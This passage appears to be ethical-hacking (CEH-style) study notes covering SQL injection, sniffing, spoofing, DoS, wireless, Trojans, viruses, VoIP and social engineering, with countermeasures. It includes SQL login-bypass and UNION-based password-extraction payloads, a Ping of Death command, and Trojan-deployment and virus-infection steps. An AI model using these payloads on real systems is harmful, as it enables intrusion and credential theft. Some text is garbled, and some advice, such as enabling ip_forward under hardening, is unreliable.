In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user to the combination it has already stored. Each type of web application is hard coded with specific SQL queries that it will execute when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitized, a hacker may inject additional SQL commands that broaden the range of SQL commands the web application will execute, thus going beyond the original intended design and function. A hacker will thus have a clear channel of communication (or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and network security equipment installed before the physical database server. To test a site for SQL attack. Use a single quote in the input:    blah‘ or 1=1— Login:blah‘ or 1=1—blah 1 1 Password:blah‘ or 1=1—

The next big thing is :How to retrieve data any DataTo get the login_name from the―admin login‖ table http:// /index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login-From above, you get login_name of the admin_user. To get the password for login name=―yuri‖ http‖// /index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=‗yuri‘-Tools for SQL Injection     Wpoison Pearlscript SQLDict SqlExec

       

SQLbf SQLSmack SQL2.exe AppDetective Database Scanner SQLPoke NGSSQuirreL SQLPing v2.2

Preventing SQL Injection Preventing SQL injection is best achieved through the techniques discussed above. You should also make sure that the application is running with only enough rights to do its job and implements error handling, so that when the system detects an error, it will not provide the attacker with any useable information. SQL Injection in Oracle      UNIONS can be added to the existing statement to execute a second statement SUBSELECTS can be added to existing statements Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string INSERTS, UPDATES, and DELETES can also be injected Anonymous PL/SQL block in procedures

SQL Injection in MySql It is not easy to perform SQL injection in a MySql database. While coding with a MySql application, the injection vulnerability is not exploited. It is difficult to trace the output. You can see an error because the value retrieved is passed on to multiple queries with different numbers of columns before the script ends.In such situations, SELECT and UNION commands cannot be used.

8. NETWORK ATTACKS Sniffers A sniffer or packet analyzer can be software or hardware based. Its function is to capture and decode network traffic. Sniffers typically place the NIC into promiscuous mode. Captured traffic can be analyzed to determine problems in a network such as bottlenecks or performance degradation. Sniffers can also be used by an attacker or unauthorized individual to capture clear text passwords and data from the network. Protocols such as FTP, Telnet, and HTTP are especially vulnerable as they pass all usernames and passwords in clear text.

Passive Sniffing Passive sniffing is made possible through the use of hubs. As hubs treat all ports as one giant collision domain, all traffic is visible. Unfortunately for the attacker, most modern networks no longer use hubs. This makes the capture of unauthorized traffic more difficult. That is unless the attacker is sniffing a wireless network as it acts as a hub, not a switch. Active Sniffing Switches do not operate like hubs. By default, they make each physical port a separate collision domain. Therefore, active sniffing requires that the switch be manipulated in some fashion. The objective is to force the switch to pass the attacker the needed traffic. Otherwise, the attacker will only see the traffic bound for his particular port or broadcast traffic, which by default, is passed to all ports.

Generic Sniffing Tools These tools allow you to view real-time packet captures and configure filters for pre/post filtering. Once the data is captured, these programs allow you to interactively view each packet and its individual headers. Descriptions of the packet headers are summarized. Most will also allow you to reconstruct individual TCP streams. Some of these programs are freely available, while others are quite expensive.  WinDump – A Windows based command line TCPDump program  TCPDump – The most well-known Unix based sniffing program  Ethereal – A great GUI TCP/IP sniffer. It is free and available at  EtherPeek – A commercial grade sniffer developed by WildPackets Specialized Sniffing Tools Unlike the generic tools listed above, these tools capture specific types of traffic. These are optimized for hacking and penetration testing as all the non-essential information has been removed.  DSniff – Captures clear text usernames and passwords.  Mailsnarf - Optimized to capture clear text mail information.  URLsnarf – Builds a list of all browsed URLS.  Webspy – Opens the URL the victim is browsing on the attacker‘s computer  Cain – Sniff traffic, capture/crack passwords, and enumerate Windows networks.  Ettercap – multipurpose sniffer/interceptor/logger for switched LAN‘s. Overcoming Switched Networks Sniffing traffic on a switched network can be accomplished through one of two ways: Flooding or ARP Spoofing.

Flooding Flooding is simply the process of sending the switch more MAC addresses than the CAM (Content Addressable Memory) can hold. Some, but not all switches that are flooded with such a high amount of traffic will default open. Simply stated, these devices will begin to function as a hub passing all traffic to all ports. One of the programs an attacker may use to attempt to accomplish this technique is EtherFlood. ARP Spoofing This technique corrupts the ARP protocol to attempt the redirection of switched traffic. Normally, ARP is used to resolve known IP addresses to unknown MAC addresses. Once the ARP protocol has performed this resolution, the results are stored in the ARP cache. It is stored there for a short period of time to speed consequent communications and reduce broadcast traffic. Since ARP is a trusting protocol, a victim‘s computer will accept an unsolicited ARP response. This unsolicited ARP response can be used to fool the victim‘s computer into communicating with the wrong device. For the attacker to be successful, he must also fool the switch and enable IP forwarding to move the data from his computer, to its true destination. At this point, he will have successfully placed himself in the traffic stream and can capture all forthcoming data transmissions. Several programs are available that can accomplish this attack. One such program is MAC Spoofing MAC spoofing tools allow the attacker to pretend to be another physical device. This type of attack may be used in situations where switch ports are locked by MAC address. These tools are available for Windows and Linux. Some can even be used to spoof wireless network cards.  Macof – Floods the network with random MAC addresses  SMAC – Windows MAC address spoofing tool  MAC Changer – Linux MAC address spoofing tool DNS Spoofing DNS spoofing is a hacking technique used to inject DNS servers with false information. It enables malicious users, redirects users to bogus websites, or can be used for denial of service attacks. A good understanding of DNS and zone files are required to pass the CEH exam. Zone files contain SOA, NS, A, CNAME, and MX records. Other DNS record types include: PTR, HINFO, and MINFO. The two basic approaches to DNS spoofing are:  Hijack the DNS query and redirect the victim to a bogus site  Hack the DNS server, thereby, forcing it to provide a false response to a DNS query Two of the tools available to the attacker to perform DNS spoofing are:  WinDNSSpoof  Distributed DNS Flooder

Detecting Sniffers and Monitoring Traffic It is not easy to detect sniffers on the network. Organizations should make sure their policies disallow unauthorized sniffers. There should also be a heavy penalty placed on those found to be in violation of such policies. There are some tools that can aid the network security administrator in maintaining compliance to this policy, such as, SniffDet, IRIS and NetIntercept.

Denial of Service (DOS) A DoS attack is any type of attack that brings a system offline or otherwise makes a host's service unavailable to legitimate users. Early DoS attacks were often described as annoying, frustrating, or a nuisance. Modern DoS attacks have increased in sophistication and can render a network unusable. These attacks can cost corporations money through lost sales and profits. While it may be difficult to place an exact monetary figure on DoS attacks, they are costly. DOS Attacks or Denial Of Services Attack have become very common amongst Hackers who use them as a path to fame and respect in the underground groups of the Internet. Denial of Service Attacks basically means denying valid Internet and Network users from using the services of the target network or server. It basically means, launching an attack, which will temporarily make the services, offered by the Network unusable by legitimate users. In others words one can describe a DOS attack, saying that a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users. Or you send the target system data packets, which cannot be handled by it and thus causes it to either crash, reboot or more commonly deny services to legitimate users. Common DoS Attacks Popular DoS attacks can be separated into three categories:  Bandwidth  Protocol  Logic Common DoS Attack Strategies No matter the type, the end result is the same, loss of service for the legitimate users. Some of the more common DoS attack strategies are: Ping of Death, SSPing, Land, Smurf, SYN Flood, Win Nuke, Jolt2, Bubonic, Targa, and Teardrop. Common DDoS(Distributed DoS) Attacks DDoS software has matured beyond the point where it can only be used by the advanced attacker. The most powerful DDoS programs are open source code. While these programs reside in the virtual space of the Internet, programmers tweak them, improve them, and add features to each successive iteration. Some common DdoS Attack strategies are: Trin00 1, TFN, TFN2K, Stacheldraht, Shaft and Mstream.

DDoS Attack Sequence DDoS attacks follow a two-prong attack sequence:  Mass Intrusion  Attack Phase DOS Attacks are of the following different types-:    Those that exploit vulnerabilities in the TCP/IP protocols suite. Those that exploit vulnerabilities in the Ipv4 implementation. There are also some brute force attacks, which try to use up all resources of the target system and make the services unusable.

Some common vulnerabilities in TCP/IP are Ping of Death, Teardrop, SYN attacks and Land Attacks.

Ping of Death This vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them to reboot) so that no users can use its services. This exploit no longer works, as almost all system administrators would have upgraded their systems making them safe from such attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attack could be carried out even through the command line, in the following manner: The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim's computer: C:\windows>ping -l 65540 Teardrop The Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is being sent over the Internet, it is broken down into smaller fragments at the source system and put together at the destination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number of packets, with each packet carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets, then:  The first Packet will carry data from 1 byte to 1500 bytes  The second Packet will carry data from 1501 bytes to 3000 bytes  The third packet will carry data from 3001 bytes to 4000 bytes

These packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to which byte does that particular data packet carries data or the range of data that it is carrying. This along with the sequence numbers helps the destination system to reassemble the data packets in the correct order. Now in this attack, a series of data packets are sent to the target system with overlapping Offset field values. As a result, the target system is not able to reassemble the packets and is forced to crash, hang or reboot. Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet) Normally a system receives data packets in the following form, with no overlapping Offset values. ___ ___ ___ (1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes) Now in a Teardrop attack, the data packets are sent to the target computer in the following format: ___ ___ ___ (1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes) When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot. SYN Attack The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how SYN Attacks work, you need to first know how TCP/IP establishes a connection between two systems. Whenever a client wants to establish a connection with a host, then three steps take place. These three steps are referred to as the three-way handshake. In a normal three way handshake, what happens is that, the client sends a SYN packet to the host, the host replies to this packet with a SYN ACK packet. Then the client responds with a ACK (Acknowledgement) packet. This will be clearer after the following depiction of these steps-: 1. Client --------SYN Packet--------------‡Host In the first step the client sends a SYN packet to the host, with whom it wants to establish a threeway connection. The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of the client, which is needed by the host to put back the fragmented data in the correct sequence. 2. Host -------------SYN/ACK Packet----------‡Client In the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packet sent by the client and sends the client its own ISN. 3. Client --------------ACK-----------------------‡Host In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a ACK packet. These three steps together are known as the 3-way handshake and only when they are completed is a complete TCP/IP connection established.

In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad source IP Address. When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of the with a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thus queues up all these requests until it receives an ACK message. The requests are not removed unless and until, the remote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the target machine. To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have a Bad Source IP, they queue up, use up resources and memory or the target system and eventually crash, hang or reboot the system. Land Attacks A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP Address, the IP address of the target system itself is used. This creates an infinite loop between the target system and the target system itself. However, almost all systems have filters or firewalls against such attacks. Smurf Attacks A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses from within the target network. As and when the router gets a PING message, it will route it or echo it back, in turn flooding the Network with Packets, and jamming the traffic. If there are a large number of nodes, hosts etc in the Network, then it can easily clog the entire network and prevent any use of the services provided by it. Read more about the Smurf Attacks at CERT: UDP Flooding This kind of flooding is done against two target systems and can be used to stop the services offered by any of the two systems. Both of the target systems are connected to each other, one generating a series of characters for each packet received or in other words, requesting UDP character generating service while the other system, echoes all characters it receives. This creates an infinite non-stopping loop between the two systems, making them useless for any data exchange or service provision. Distributed DOS Attacks DOS attacks are not new; in fact they have been around for a long time. However there has been a recent wave of Distributed Denial of Services attacks which pose a great threat to Security and are on the verge of overtaking Viruses/Trojans to become the deadliest threat to Internet Security. Now you see, in almost all of the above TCP/IP vulnerabilities, which are being exploited by hackers, there is a huge chance of the target's system administrator or the authorities tracing the attacks and getting hold of the attacker. Now what is commonly being done is, say a

group of 5 Hackers join and decide to bring a Fortune 500 company's server down. Now each one of them breaks into a smaller less protected network and takes over it. So now they have 5 networks and supposing there are around 20 systems in each network, it gives these Hackers, around 100 systems in all to attack from. So they sitting on there home computer, connect to the hacked less protected Network, install a Denial of Service Tool on these hacked networks and using these hacked systems in the various networks launch Attacks on the actual Fortune 500 Company. This makes the hackers less easy to detect and helps them to do what they wanted to do without getting caught. As they have full control over the smaller less protected network they can easily remove all traces before the authorities get there. Not even a single system connected to the Internet is safe from such DDOS attacks. All platforms including UNIX, Windows NT are vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used to conduct such DDOS attacks. Preventing DoS Attacks No solution provides complete protection against the threat of DoS attacks. However, there are things you can do to minimize the effect of a DoS attack. These include:      

Practice the principle of Least Privilege Limit bandwidth Configure aggressive ingress and egress filtering Keep computers up to date and patched Implement load balancing Implement IDS

DoS Scanning Tools If you believe that your computer may have been compromised, the best practice is to use a scanning tool to check for DoS infestation. There are several tools to help with this task. Some of these include: Find_ddos, SARA, DdoSPing, RID and Zombie Zapper.


Introduction –Wireless Networking Wireless networking technology is becoming increasingly popular and at the same time has introduced several security issues. The popularity of wireless technology is driven by two primary Convenience Cost A wireless local area network (WLAN) allows workers to access digital resources without being locked to their desks. Laptops can be carried into meetings or even in to a star bucks café tapping in to a wireless network. this convenience has become affordable.

Business and Wireless Attacks Business is at high risk from wireless hackers who don‘t need any physical entry into the business network to hack. but can easily compromise the network with the help of freely available tools. War driving, war chalking, warflying are some of the ways that a wireless hacker can access the vulnerability of the firms network. Components of a Wireless Network Wi-Fi Radio devices Access points Gateways

Types of Wireless Network Four basic types Peer to peer Extension to a wired network Multiple access points LAN to LAN Wireless network Setting up WLAN When setting up a WLAN, the channel and service set identifier (SSID) must be configured in addition to traditional network setting such as IP address and a subnet mask. The channel is a number between 1 and 11 and designates the frequency on which the network will operate. The SSID is an alphanumeric string that differentiates networks operating on the same channel. It is essentially a configurable name that identifies and individual network. These setting are important factors when identifying WLANs and sniffing traffic. SSID (Service Set Identifier) The SSID is a unique identifier that wireless networking devices use to establish and maintain wireless connectivity. SSIDs act as a single shared password between access points and clients. Security concerns arise when the default values are not changed. As these units can be easily compromised.

What is Wired Equivalent Privacy (WEP) WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of date on wireless networks at a level equivalent to that Of wired LANs. Wired LANs typically employ physical controls to prevent unauthorized users from Connecting to the network and viewing data. In a wireless LAN can be access without Physically connecting to the LAN. IEEE choose to employ encryption at the data link layer to prevent unauthorized Eavesdropping on a network .this is accomplished by encrypting data with the RC4 Encryption algorithm.

Denial-of-Service attacks Wireless LANs are susceptible to the same protocol based attacks that plague wired WLANs send information via radio waves on public frequencies, thus they are susceptible to inadvertent interference from traffic from the same radio band. Various types of Dos attacks: -Physical layer -Data- link layer -Network layer

Man-In-The-Middle-Attack (MITM) Eavesdropping -Happens when an attacker receives a data communication stream. -Not using security mechanism such as IPsec, SSH or SSL makes the data vulnerable to an Unauthorized user. Manipulation -an extended step of eavesdropping. -can be done ARP Poisoning. Hacking Wireless Networks Wireless networking technologies become more popular each day. The reasons are simple; wireless networks are easy to configure, easy to use, require no cabling and are inexpensive. 802.11 Standards The IEEE 802.11 committee sets the standards for the wireless protocol. The three wireless standards include:  802.11 a – Speeds up to 54 Mbps  802.11 b – Speeds up to 11 Mbps  802.11 g – Speeds up to 54 Mbps

WEP WEP (Wired Equivalent Privacy) was originally designed to protect wireless networks from eavesdropping through the use of a 40-bit key. The key was limited to 40 bits, due to export rules that existed during the late 1990s when the 802.11 protocol was developed. This provides a very limited level of encryption that is relatively easy to compromise. WEP is vulnerable because it uses a relatively short IV (Initialization Vector) and key remains static. Luckily, there are protection mechanisms that make wireless more secure. These include:  WPA – Wireless Protection Access, a replacement for WEP  LEAP – Cisco's Lightweight Extensible Authentication Protocol  PEAP – Protected Extensible Authentication Protocol Finding WLANs Finding unsecured wireless networks has become quite a fad; some criminal hackers are making a game of driving around and connecting to as many networks as they can. One of the most wellknown tools for finding WLANs is NetStumbler. Cracking WEP Keys Because of the weaknesses of WEP, locked networks can be accessed as long as enough packets can be captured. Two tools used to break into WEP secured networks are AirSnort and WEP Crack. Sniffing Traffic Just as in the wired world, there are tools that can be used to capture and sniff wireless traffic. They include AiroPeek and Kismet. Wireless Attacks Wireless networks can be attacked by several different methods. The two most common are: Wireless Dos and Access Point Spoofing.

Securing Wireless Networks Fortunately, there are ways to secure wireless networks. A good starting point is to turn on WEP and change the SSID(Service Set Identifier). Changing the SSID and enabling WEP is only the first step, since it is still transmitted in clear text. You should continue by carefully considering the placement of your WAPs and restricting the allocation of DHCP addresses on the wireless network segment. Other considerations include:  Prohibit access from unknown MAC addresses  Use Strong Authentication such as RADIUS  Consider IPSec  Build a network that maintains defense in depth

Trojan horses are programs that are malicious in nature but are disguised as benign. Once executed, they plant unwanted malicious code on the user‘s computer. These programs can, among other things, steal passwords, provide remote access, log keystroke activity, or destroy data. Trojans are nothing but remote administration tools (RATs) that provide attackers with remote control and remote access to the victim system. in other words, once a system has been infected with a Trojan, an attacker can remotely control almost all hardware and software on it. Modern day Trojans have come extremely advanced and provide attackers with a variety of different sophisticated features for remote control. Once a Trojan has been installed on a system then not only is all its data under threat, but also there is a high possibility wherein the compromised system may be misused to initiate an attack on some third- party system. Trojans are clearly extremely dangerous tools that are capable of doing a lot of harm to the victim system. Some of the most common malicious activities that can be conducted with the help of Trojans are as follows: Trojans are most commonly used by attackers to steal sensitive IP data from the victim corporations. A number of Trojans have inbuilt logging capabilities. Almost all Trojans can also be used for purely malicious purpose. Attackers often use Trojans to exploit the resources of your system (and network) to execute attack on pre-defined victim systems.

What is a Trojan Horse? The story of the Trojan Horse comes from the classic novel, The Iliad, where the Trojans placed the gift of a tall wooden horse at the city gates. The city inhabitants accepted the gift and moved it inside. Then, during the middle of the night, soldiers who were hiding inside the horse slipped out and attacked the city‘s inhabitants. Trojan programs, just as with the historical version, require the user to accept the malicious gift. Once executed, the system is infected. Therefore, the best defense is to make sure users are trained not to download or install unsolicited applications. Working The working of Trojans is quite easy to understand and using them requires almost no technical knowledge. Most Trojans are made up of the two main parts: 1. The Server part: it has installed on the victim‘s system through trickery or disguise. 2. The Client part: it is installed on the attacker‘s system and is then used to connect to the server part of the Trojan installed on the victim‘s system.

An attacker can carry out a Trojan attack on the target system by following the simple given steps: 1. The first step of an attacker‘s is to find a way to install the server part of the Trojan on the target system. This is probably one of the difficult steps in Trojan attack. Some of most common ways which one can do this is as follows: Email Autorun CD-ROMs Instant Messengers Physical access EXE Binders 2. Once the server part of the Trojan is installed on the victim‘s system, it then binds itself to a particular port on the target system and listens for connections. Each Trojan listens for connections on a pre-defined specific port number. For example, the Netbus Trojan listens for connections on the predefined port 12345. 3. Next the attacker needs to somehow find out IP address of the target system on which the server part of the Trojan has been installed. 4. Finally, the attacker uses the client part of the Trojan tool (installed on his system) to connect to the server part installed on the target system. 5. On most occasions, after compromising the target system with a Trojan, attackers install a backdoor on it. So that the next time they want access to the same system, the above cumbersome process need not be executed all over again. Common Trojans and Backdoors The most common Trojans, allow the attacker remote access to the victim's computer. Various means are used to trick the user into installing the program. Once installed, the attacker can use the Trojan to have complete access to that computer, just as if he were physically sitting in front of its keyboard. Common ways Trojans are acquired include e-mail attachments, untrusted sites, peer-topeer programs (i.e., Kazaa), or Instant Messenger downloads. Several of the most well-known Trojans are: BackOrifice 2000, QAZ, Tini, Donald Dick, SubSeven, NetBus, Beast and Netcat. Wrappers Wrappers are programs that are used to combine Trojan programs with legitimate programs. This combined, wrapped executable is then forwarded to the victim. The victim sees only the one, legitimate program and upon installation, is tricked into installing the Trojan. Not all of these programs will give the attacker the icon he needs to trick the victim into executing the program. So, tools such as Michelangelo or IconPlus will be used to alter the installation icon. It can be made to look like anything from a Microsoft Office 2000 icon, to a setup icon for the latest computer game. Covert Channels Covert channels rely on the principle that you cannot deny what you must permit. Therefore, if protocols such as HTTP, ICMP, and DNS are allowed through the firewall, these malicious

programs will utilize those openings. Three of the top covert channel programs are listed below:  ACK CMD - Uses TCP ACK‘s as a covert channel  Loki – Uses ICMP as a covert channel  Reverse WWW Shell – Uses HTTP as a covert channel

Backdoor Countermeasures The cheapest countermeasure to implement is that of educating users not to download and install applications from e-mail or the Internet. Anti-virus software must also be installed and kept current. Outdated anti-virus software is of little to no value. If you suspect a computer has become infected with a Trojan or backdoor:  use a port-monitoring tool to investigate running processes and applications and,  install a cleaner to remove the malicious software. Port Monitoring Tools The tools listed below are one quick and simple way to investigate the programs and processes running on a computer. Even without the add-on tools listed below, you can still get a good look at running processes and applications by using the GUI Task Manager. Another built-in port activity tool that is command line based is Netstat. Fortunately, there are lots of good port monitoring tools available to monitor programs and processes. Several of these are: Fport, TCPView, Process Viewer and Inzider. System File Verification Whenever Trojans are discovered, you will need to thoroughly investigate the amount of damage that has been done. Remember that the three basic tenets of security are confidentiality, integrity, and availability. One or more of these most likely has been violated. If you are no longer sure of the integrity of the file system, you will be required to reinstall from a known, good backup media. There are other ways to verify the integrity of the system. These include: WFP (Windows File Protection), MD5SUM and TripWire.

Viruses A computer virus is nothing more than a malicious program that is capable of duplicating itself solely for the purpose of causing damage. Viruses do not spontaneously execute on one‘s computer; they must be given control via an overt act, such as clicking on an executable file attached to an email message; or via an implicit permission that allows your software (IE for example) to automatically execute certain kinds of programs (or scripts). Typically, when a virus gets control it copies itself into other files on one‘s system and then tries to hitch a ride via email or other network-based means to other computers. Viruses can only spread by infecting other objects like programs, files, documents, or e-mail attachments. If a virus fails to infect a file or

program, it cannot spread. Some well-known viruses that have destroyed data and infected computer systems include: Cherobyl, ExploreZip, I Love You and Melissa. Unlike a virus, a worm is a self-propagating program. Worms copy themselves from one computer to another, often without the user‘s knowledge. Some well-known worms that have destroyed data and infected computer systems include: Pretty Park Worm, Code Red Worm, W32/Klex Worm, BugBear Worm, W32/Opas erv Worm, SQL Slammer Worm, Code Red Worm, MS Blaster and Nimda Worm. Batch Programming Batch file programming is nothing but the Windows version of Unix Shell programming. Let's start by understanding what happens when we give a DOS command. DOS is basically a file called It is this file ( which handles all DOS commands that you give at the DOS prompt---such as COPY, DIR, DEL etc. These commands are built in with the file. (Such commands which are built in are called internal commands).DOS has something called external commands too such as FORMAT, UNDELETE, BACKUP etc. So whenever we give a DOS command either internal or external, either straightaway executes the command (Internal Commands) or calls an external separate program which executes the command for it and returns the result (External Commands). Why do we need Batch File Programs? Say you need to execute a set of commands over and over again to perform a routine task like Backing up Important Files, Deleting temporary files(*.tmp, .bak , ~.* etc) then it is very difficult to type the same set of commands over and over again. To perform a bulk set of same commands over and over again, Batch files are used. Batch Files are to DOS what Macros are to Microsoft Office and are used to perform an automated predefined set of tasks over and over again. How to create batch files? Batch files are basically plain text files containing DOS commands. So the best editor to write your commands in would be Notepad or the DOS Editor (EDIT) All you need to remember is that a batch file should have the extension .BAT(dot bat)Executing a batch file is quite simple too. For example if you create a Batch file and save it with the filename batch.bat then all you need to execute the batch file is to type: C:\windows>batch.bat What happens when you give a Batch file to the to execute? Whenever comes across a batch file program, it goes into batch mode. In the batch mode, it reads the commands from the batch file line by line. So basically what happens is, opens the batch file and reads the first line, then it closes the batch file. It then executes the command and again reopens the batch file and reads the next line from it. Batch files are treated as Internal DOS commands.

Note While creating a batch file, one thing that you need to keep in mind is that the filename of the batch file should not use the same name as a DOS command. For example, if you create a batch file by the name dir.bat and then try to execute it at the prompt, nothing will happen. This is because when comes across a command, it first checks to see if it is an internal command. If it is not then checks if it a .COM, .EXE or .BAT file with a matching filename. All external DOS commands use either a .COM or a .EXE extension, DOS never bothers to check if the batch program exits. First take up a simple batch file which executes or launches a .EXE program. Simply type the following in a blank text file and save it with a .BAT extension. C: cd windows telnet Now let's analyze the code, the first line tells to go to the C: Next it tells it to change the current directory to Windows. The last line tells it to launch the telnet client. You may contradict saying that the full filename is telnet.exe. Yes you are right, but the .exe extension is automatically added by Normally we do not need to change the drive and the directory as the Windows directory is the default DOS folder. So instead the bath file could simply contain the below and would still work. Launch (DOS) and execute the batch file by typing: C:\WINDOWS>batch_file_name You would get the following result: C:\WINDOWS>scandisk And Scandisk is launched. So now the you know the basic functioning of Batch files. Let's move on to Batch file commands  The REM CommandThe simplest basic Batch file command is the REM or the Remark command. It is used extensively by programmers to insert comments into their code to make it more readable and understandable. This command ignores anything there is on that line. Anything on the line after REM is not even displayed on the screen during execution. ECHO: The Batch Printing ToolThe ECHO command is used for what the Print command is in other programming languages: To Display something on the screen. It can be used to tell the user what the bath file is currently doing.

 

We can prevent a particular command from being shown but still be executed by preceding the command with a @ sign. The EXIT commandEnds your batch file.

Virus Writing Types of Viruses          Boot Viruses Program Viruses Multipartite Viruses Stealth Viruses Polymorphic Viruses Macro Viruses Active X FAT COM Viruses

Virus Infection STEP I- Finding file to infect Efficiency in finding an file for infection or targeted for infection increases the performance of viruses. STEP II- Check Virus Infection Criteria Check whether file and program should be infected or not. STEP III- Check for previous Infection Check whether the file is already infected or not. STEP IV- Infect the File Save the file attributes; Change the file attribute to nothing; Open the file in read/write mode; Run virus routines. STEP V- Covering Tracks Restore file attributes to avoid detection.

Trigger Mechanism Set a logical condition for activation of virus; Are of following types:  Counter Trigger  KeyStroke Trigger  Time Trigger  Replication Trigger  System Parameter Trigger  Null Trigger

Introduction Voice Over Internet Protocol (VOIP) refers to transmission of voice over IP based networks. Also known as ―Packet Telephony‖. It uses IP protocol to route voice traffic. Voice is compressed using CODECS hence bandwidth is utilized efficiently. Renowned for its low cost and advantageous to customers in case of long distance calls. VOIP Hacking Steps     Footprinting Scanning Enumeration Exploiting the network

Footprinting Public web site research; Google hacking; WHOIS & DNS analysis. Information includes:  Organizational Structure and corporate locations  Help & Tech Support  Job Listings  Domain name Lookup  Phone numbers and extensions  VoIP vendors press releases and case studies  Resumes  Mailing lists and local user group postings  Web based VoIP logins

Scanning Collect an active target lists and figure out what devices are accessible on the network. Ping large number of IP address and wait for any responses. Methods to Ping:  ICMP ping sweeps  ARP pings  TCP ping scans  SNMP sweeps Determine the vulnerabilities present on the target host or devices. Method to scan active services:  TCP scan

 UDP scan Determine the type of devices, hosts by OS and firmware types. Method to identify host/devices:  Stack Fingerpinting Tools to be used:  Nmap  Xprobe2  Arkin  Queso  Snacktime Enumeration      Extract user names using Win2k enumeration. Gather information from the host using null sessions. Perform windows enumeration using SuperScan4. Get the users‘ account using GetAcct. Perform an SNMP port scan using SNScanV1.05.

Exploiting the network      Launch various attacks based on vulnerability existing Compromise an network node Gain access to a network Now access the network and start sniffing Intercept through VoIP signaling Manipulation to insert Rouge Applications.

Social Engineering is the art of manipulation and the skill of exploiting human weakness. A social engineering attack may occur over the phone, by e-mail, by a personal visit, or through the computer. The intent of the attack is to acquire information, such as user IDs and passwords. While these attacks may seem relatively low-tech, they target an organization‘s weakest link, its employees. Common Types of Social Engineering Social engineering attacks can be divided into two categories:  Human Based  Computer Based Human Based Impersonation Human based attacks are relatively low-tech and are reminiscent of a scam or something you would expect from a con man. The six primary types of human based social engineering are listed below:  Important User  Tech Support

   

Third Party Authorization In Person Dumpster Diving Shoulder Surfing

Computer Based Impersonation This type of social engineering attack attempts to use a computer as the interface. These attacks can come in any of the following forms:  Mail Attachments  Popup Windows  Website Faking  SPAM Social Engineering Prevention Defense requires a good offense. Employees need to be made aware of social engineering attacks. They must also be given procedures that can be used to verify an individual‘s identity. Training and education must be continual to remind employees to protect valuable resources. The following three steps can help protect your organization from this easy to launch, hard to prevent attack:  Policies and Procedures  Training  Employee Education

Linux Basics                  Linux is case sensitive Linux filenames can contain maximum 256 characters In Linux file extensions don‘t play big role and are not necessary Its file system is hierarchical In Linux we don‘t have any drive letters, instead they are recognized as /dev/sda1, /dev/sda2 Linux root directory is denoted by / Nano, vi, vim, pico are common command line editors which are widely used CP is command to copy a file MV is command to move and rename a file Mkdir is command to create a directory Rmdir is command to remove empty directories Rm is command to delete files and folders Find is a command to find the files In Linux we have three types of user Root user, Service User, Normal User Root user will always have uid:gid=0:0 Normal User will always have uid:gid starting from 500:500

        

Service Users uid:gid always exists between 0 – 500 Service user are not allowed to login by default where as root and normal user can login User‘s User Id, Group Id, home directory and shell is allocated to them in the /etc/passwd file Linux password are stored in MD5 hashes in /etc/shadow file ARP is a command which is mostly used to for checking existing Ethernet connectivity and IP address Ipconfig is command line tool which checks all interface cards and shows information regarding them PS is a command which lists all existing process on the server Route is a command which lists all routing tables for your server Shred is a command which deletes a file securely by overwriting its contents

Why is Linux Hacked? Linux is used on more than 80% of all web servers on internet. Finding vulnerability in such a popular OS or its related applications for web servers would mean that you can virtually hack into any website on the internet, depending upon the type of vulnerability. Linux users generally use no antivirus program which makes it more difficult to detect if a Linux machine is compromised or not. For servers a lot of rootkit scanners and software firewalls are available, however they are not very easy to use and configure as Linux is not very user friendly for non technical people. Recent Vulnerabilities     Kerberos Vulnerability-[USN-999-1] LVM2 Vulnerability-[USN-1001-1] Apache Vulnerability-[USN-990-2] Dpkg Vulnerability-[USN-986-3]

Secure your Linux  Linux has lots of inbuilt processes to secure itself  /etc/sysctl.conf- sysctl.conf is used to alter the parameters of Linux Kernel to make it more secure  Apply Following configuration Net/ipv4/conf/all/rp_filter=1 Net/ipv4/conf/all/log_martians=1 Net/ipv4/conf/all/send_redirects=0 Net/ipv4/conf/all/accept_source_route=0 Net/ipv4/conf/all/accept_redirects=0 Net/ipv4/tcp_syncookies=1 Net/ipv4/icmp_echo_ignore_broadcast=1 Net/ipv4/ip_forward=1

